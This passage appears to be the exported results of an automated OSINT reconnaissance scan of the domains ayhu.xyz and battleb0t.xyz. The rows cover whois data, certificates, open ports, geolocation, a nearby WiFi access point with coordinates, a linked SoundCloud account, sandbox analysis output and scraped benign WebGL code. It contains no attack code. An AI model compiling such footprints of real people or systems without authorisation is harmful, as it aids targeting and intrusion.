-fYvExK0W6Ze5BMg7wpM4RSZGt0EBF4MTRkHZYYHYqVG2Gs4Dr0KphCmDsWmTYs-Wp4YmyX8zHXt6eDU7SHKTxfT3pFaOqsKIwmwk1FnA5ZOhkDp5FB4KDNaO4UI8hC2NqGaVRdddker5xFPIyxy6_xtT-933_JQEm4Yo3p33SKpnr5oZLDUmiFpcGiocX8E23z9qF6KzqiLjSYYuEdSQjfT3AOVajEAM3LV2cJ-Yfb6qV1mYvKIEbYataggM_S7XSDOMFwSxuBJJhFB_YuSQY42F1bw3h-Wr_txcqos6CYojszcuJZzN7ZQwVv-pfKRrZP1vW37Ji7qXYRsXGXizVLTDb80myaduEuuPiE3
j_iEUTMQHyX7FS77GwsNXMOnK-SOX4LESTyuge5gQCwNBG5LYbWqG1phc6ZBmjChX4XXPYEWTd6pqzDCahUeE-UBjC440QhIoggi4SFzrJT424_2pz3I1Z7K9v14oR0ixYp8X0YQSjX1TvMb1hvE05cdAoJpi9QPGYD511Yvrjtr2-nQRWT9vJBLGPT61xgS5JvfKWkR5mzvNMNLXnN-QaI-YMwAUvPR8sObbMc6Js74f0zl0__XqC1L4ZGx1B6W2mPRUMY1Lrg2rh8ki2L2eiGI4MSaqbVecE9vJyl6XPRcjgNKIcsC-zohWzf7sSDfofcLJcUO1xeUIJMC_3B3JBlhmMy_ukD9DKdx40muRRW18iGtfkoFnEyb5ylZEa9Cy6RH0tiulb9zDYu9lBPk43UYKuS0gITgFj7t6HoYRbYh8Mhdn_KQTmpy5fsQY55ZC7EUgiiqGZ2kxox4gPzr-qiw2zxNU0kuoof8T7V06bM_gPceZS49qqZ0qEgovgoUQEY1PrObCR2N_zXcey5RpH4biNXy5X3XHfa8DJrozVWuJVN7xKblnML0zEboEJxIy0gm8PmeTSLtq0S2uPc6VyK0a0Z4v1q4hj82ek">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '64193',
cRay: '7c5f60726fad1912',
cHash: '710742417ab72e7',
cUPMDTk: "\/?__cf_chl_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
t: 'MTY4Mzg2MDA2My4xMDMwMDA=',
m: 'Eo2K0b1/t+yBaonJiJkwi8mL0OupY28MY+kXkSexuGA=',
i1: 'WdeoMAtxqx1knlB7AiLouA==',
i2: 'PLvf+P/FOv6sb4wuUck9Eg==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60726fad1912');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60726fad1912';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=KlbaNJzGw77sVIKMODL.ADC4FpZJphIcqM52Ij1fyiw-1683860063-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
| https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 03:25:40 | Similar Domain - Whois | No | Whois | 0 | 0 | 2 | 0 | None | % Restricted rights.
%
% Terms and Conditions of Use
%
% The above data may only be used within the scope of technical or
% administrative necessities of Internet operation or to remedy legal
% problems.
% The use for other purposes, in particular for advertising, is not permitted.
%
% The DENIC whois service on port 43 doesn't disclose any information concerning
% the domain holder, general request and abuse contact.
% This information can be obtained through use of our web-based whois service
% available at the DENIC website:
% http://www.denic.de/en/domains/whois-service/web-whois.html
%
%
Domain: ayhu.de
Nserver: sl1.sedo.com
Nserver: sl2.sedo.com
Status: connect
Changed: 2022-11-14T12:13:16+01:00
| ayhu.de |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:80 | 188.114.96.0/24 |
| 2023-05-12 02:50:15 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | files.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:b9:dc:49:67:68:c5:fe:31:cf:92:a4:a3:f2:91:5a:dc:15
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Jan 2 19:07:11 2023 GMT
Not After : Apr 2 19:07:10 2023 GMT
Subject: CN=files.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CF:FE:0F:FB:EC:E3:E9:7B:CF:AB:EA:49:61:6D:B0:C0:A0:EB:11:BC
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:files.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:27 | Web Server | No | URLScan.io | 0 | 0 | 1 | 0 | None | cloudflare | ayhu.xyz |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | SoundCloud (Category: music)
https://soundcloud.com/ayhu | ayhu |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-cache-status: DYNAMIC | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 02:44:42 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:91:08:65:b4:56:94:e3:89:37:6b:c8:ee:5a:fc:f4:80:52
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:05:11 2023 GMT
Not After : May 25 03:05:10 2023 GMT
Subject: CN=oldfluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D5:29:D7:46:02:65:73:65:FC:F5:A7:7C:2E:6F:96:79:D8:67:A4:E6
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:oldfluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:05:12.050 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Feb 24 04:05:12.068 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:23:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.8:443 | 188.114.96.0/24 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:8080 | 188.114.96.0/24 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:06:A5) | 52.3759, 4.8975 |
| 2023-05-12 02:49:49 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://justice.cz/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"194.213.41.170:443"\n "69.16.175.10:443"\n "185.199.110.153:443"\n "192.229.163.25:443"\n "49.12.245.76:443"\n "142.250.191.40:443"\n "142.250.141.154:443"\n "157.240.22.35:443"\n "104.22.24.150:443"\n "157.240.22.25:443"\n "185.60.216.52:443"\n "157.240.20.63:443"\n "157.240.22.20:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_f68_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f68_ConnHashTable<3944>_HashTable_Mutex"\n "IsoScope_f68_IE_EarlyTabStart_0xf20_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f68_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_f68_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3944"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_f68_IESQMMUTEX_0_331"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3944"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.lightwidget.com"\n "code.jquery.com"\n "justice.cz"\n "lightwidget.com"\n "portalapl01.servis.justice.cz"\n "scontent-frt3-2.cdninstagram.com"\n "scontent-frx5-1.cdninstagram.com"\n "scontent-sjc3-1.xx.fbcdn.net"\n "video-sjc3-1.xx.fbcdn.net"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3532.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar3484.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar328E.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab321E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', 
u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "combo_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "AMOH3QA1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AMOH3QA1.txt]- [targetUID: 00000000-00003944]\n "search_icon_1_.png" has type "PNG image data 21 x 22 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "fH-KenfeQjI_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "315741146_1401731960362970_7444101996956285481_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1440x1440 components 3"- [targetUID: N/A]\n "navigation_1_.htm" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "3dl2SsY1JNJ_1_.png" has type "PNG image data 81 x 378 8-bit colormap non-interlaced"- [targetUID: N/A]\n "wtbxHBt7RZw_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "M5RPsIIWHWO_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003680]\n "main_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "325666019_185145374200950_2918817704667586375_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 720x1280 components 3"- [targetUID: N/A]\n "autocomplete-search_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "PkV8_5hF_8w_1_.png" 
has type "PNG image data 21 x 131 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "page_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "qGoWo6gBwwP_1_.png" has type "PNG image data 28 x 168 8-bit colormap non-interlaced"- [targetUID: N/A]\n "~DF4008C994FE360571.TMP" has type "data"- Location: [%TEMP%\\~DF4008C994FE360571.TMP]- [targetUID: 00000000-00003944]\n "327730364_500683298907150_5975051271861994663_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 213x160 components 3"- [targetUID: N/A]\n "323431877_824211398639073_8090660628312221513_n_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 526x195 components 3"- [targetUID: N/A]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /widgets.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://justice.cz/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: platform.twitter.com\nIf-Modified-Since: Tue, 21 Nov 2017 00:17:05 GMT\nIf-None-Match: "3e4504e992f3a97e51fd54697a0f1b2e+gzip"\nDNT: 1\nConnection: Keep-Alive" (Indicator: "twitter")\n "GET /plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nReferer: https://justice.cz/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 
Gecko\nAccept-Encoding: gzip, deflate\nHost: www.facebook.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "POST /platform/plugin/page/logging/ HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nX-FB-LSD: FFgmxX5EibZTC1odP1pfSA\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: www.facebook.com\nContent-Length: 454\nDNT: 1\nConnection: Keep-Alive\nCache-Control: no-cache" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/y1/r/nMFM52FAyXC.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.xx.fbcdn.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/yo/r/g2f3nzotF0C.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: static.xx.fbcdn.net\nDNT: 1\nConnection: Keep-Alive" (Indicator: "facebook.com")\n "GET /rsrc.php/v3/yf/l/0,cross/xUCu69_VoIG.css?_nc_x=Ij3Wp8lg5Kz HTTP/1.1\nAccept: 
text/css, */*\nReferer: https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fministerstvospravedlnosti%2F&tabs=timeline&width=500&height=950&small_header=false&adapt_container_width=true&hide_cover=false&show_facepile=true&appId\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHos | 185.199.110.153 |
| 2023-05-12 02:54:27 | Physical Location | No | Censys | 0 | 0 | 4 | 0 | None | Seattle, Washington, 98108, United States, North America | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.98): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route3.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | North Charleston, South Carolina, 29418, United States, North America |
| 2023-05-12 02:54:16 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /*
MIT License
Copyright (c) 2017 Pavel Dobryakov
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
*/
'use strict';
const canvas = document.getElementsByTagName('canvas')[0];
resizeCanvas();
let config = {
SIM_RESOLUTION: 256,
DYE_RESOLUTION: 1024,
CAPTURE_RESOLUTION: 512,
DENSITY_DISSIPATION: 0.97,
VELOCITY_DISSIPATION: 0.98,
PRESSURE: 0.8,
PRESSURE_ITERATIONS: 20,
CURL: 30,
SPLAT_RADIUS: 0.3,
SPLAT_FORCE: 6000,
SHADING: true,
COLORFUL: true,
COLOR_UPDATE_SPEED: 10,
PAUSED: false,
BACK_COLOR: { r: 0, g: 0, b: 0 },
TRANSPARENT: false,
BLOOM: false,
BLOOM_ITERATIONS: 8,
BLOOM_RESOLUTION: 256,
BLOOM_INTENSITY: 0.8,
BLOOM_THRESHOLD: 0.6,
BLOOM_SOFT_KNEE: 0.7,
SUNRAYS: true,
SUNRAYS_RESOLUTION: 196,
SUNRAYS_WEIGHT: 1.0,
SOUND_SENSITIVITY: 0.25,
FREQ_RANGE: 8,
}
var timer = setInterval(randomSplat, 3500);
var _runRandom = true;
var _isSleep = false;
function randomSplat()
{
if(_runRandom == true && _isSleep == false)
splatStack.push(parseInt(Math.random() * 20) + 5);
}
//lively is minimizing browser window to pause.
//this wont obviously work once I implement proper pause -> todo:- do not call livelyAudioListener() when paused/minimized.
document.addEventListener("visibilitychange", function() {
//alert(document.hidden+ " "+document.visibilityState);
_isSleep = document.hidden;
}, false);
let timeout;
let timeoutBool=true;
function livelyAudioListener(audioArray) {
if (audioArray[0] > 5 || _isSleep == true)
{
_runRandom = true;
return;
}
if(audioArray[0]>0.1 && _runRandom){
_runRandom = false;
clearTimeout(timeout);
timeoutBool=true;
}
else{
if(!_runRandom && timeoutBool){
timeoutBool=false;
timeout=setTimeout(()=>_runRandom=timeoutBool=true,1500);
}
}
let bass = 0.0;
let half = Math.floor(audioArray.length / 2);
for (let i = 0; i <= config.FREQ_RANGE; i++) {
bass += audioArray[i];
bass += audioArray[half + i];
}
bass /= (config.FREQ_RANGE * 2);
multipleSplats(Math.floor((bass * config.SOUND_SENSITIVITY) * 10));
}
function multipleSplats (amount) {
for (let i = 0; i < amount; i++) {
const color = config.COLORFUL ? generateColor() : Object.assign({}, config.POINTER_COLOR.getRandom());
color.r *= 10.0;
color.g *= 10.0;
color.b *= 10.0;
const x = canvas.width * Math.random();
const y = canvas.height * Math.random();
const dx = 1000 * (Math.random() - 0.5);
const dy = 1000 * (Math.random() - 0.5);
splat(x, y, dx, dy, color);
}
}
function generateColor () {
let c = HSVtoRGB(Math.random(), 1.0, 1.0);
c.r *= 0.15;
c.g *= 0.15;
c.b *= 0.15;
return c;
}
function pointerPrototype () {
this.id = -1;
this.texcoordX = 0;
this.texcoordY = 0;
this.prevTexcoordX = 0;
this.prevTexcoordY = 0;
this.deltaX = 0;
this.deltaY = 0;
this.down = false;
this.moved = false;
this.color = [30, 0, 300];
}
let pointers = [];
let splatStack = [];
pointers.push(new pointerPrototype());
const { gl, ext } = getWebGLContext(canvas);
if (isMobile()) {
config.DYE_RESOLUTION = 512;
}
if (!ext.supportLinearFiltering) {
config.DYE_RESOLUTION = 512;
config.SHADING = false;
config.BLOOM = false;
config.SUNRAYS = false;
}
startGUI();
function getWebGLContext (canvas) {
const params = { alpha: true, depth: false, stencil: false, antialias: false, preserveDrawingBuffer: false };
let gl = canvas.getContext('webgl2', params);
const isWebGL2 = !!gl;
if (!isWebGL2)
gl = canvas.getContext('webgl', params) || canvas.getContext('experimental-webgl', params);
let halfFloat;
let supportLinearFiltering;
if (isWebGL2) {
gl.getExtension('EXT_color_buffer_float');
supportLinearFiltering = gl.getExtension('OES_texture_float_linear');
} else {
halfFloat = gl.getExtension('OES_texture_half_float');
supportLinearFiltering = gl.getExtension('OES_texture_half_float_linear');
}
gl.clearColor(0.0, 0.0, 0.0, 1.0);
const halfFloatTexType = isWebGL2 ? gl.HALF_FLOAT : halfFloat.HALF_FLOAT_OES;
let formatRGBA;
let formatRG;
let formatR;
if (isWebGL2)
{
formatRGBA = getSupportedFormat(gl, gl.RGBA16F, gl.RGBA, halfFloatTexType);
formatRG = getSupportedFormat(gl, gl.RG16F, gl.RG, halfFloatTexType);
formatR = getSupportedFormat(gl, gl.R16F, gl.RED, halfFloatTexType);
}
else
{
